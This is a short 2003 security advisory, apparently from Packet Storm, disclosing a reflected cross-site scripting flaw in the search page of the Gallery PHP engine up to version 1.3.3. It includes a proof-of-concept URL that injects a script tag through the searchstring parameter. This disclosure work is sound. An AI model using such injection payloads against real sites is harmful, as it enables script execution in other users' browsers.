Gallery versions 1.3.3 and below suffer from a cross-site scripting vulnerability in its searching functionality.
3b40870b0304d5f379e4c14f009bb9a9df94a16511285d52a426f305dbde5f76#######################################################################
Application: Gallery
Vendors:
http://gallery.sourceforge.net
http://gallery.menalto.com
Versions: <= 1.3.3
Platforms: Windows/Unix
Bug: Cross Site Scripting Vulnerabillity
Risk: Low
Exploitation: Remote with browser
Date: 30 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
Gallery 1.3.3 is an automated php Gallery engine. It is quite secure, and
very effective as a
web gallery.
#######################################################################
======
2) Bug
======
When the webserver hosting gallery 1.3.3 recieves a "GET
/<galleryfolder>/search.php"
it reffers to search.php as it should. However when searching
"<script>alert('XSS')</script>"
or requests "GET
/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</script>"
the server allows an attacker so inject & execute scripts.
#######################################################################
===========
3) The Code
===========
http://<host>/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</
script>
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed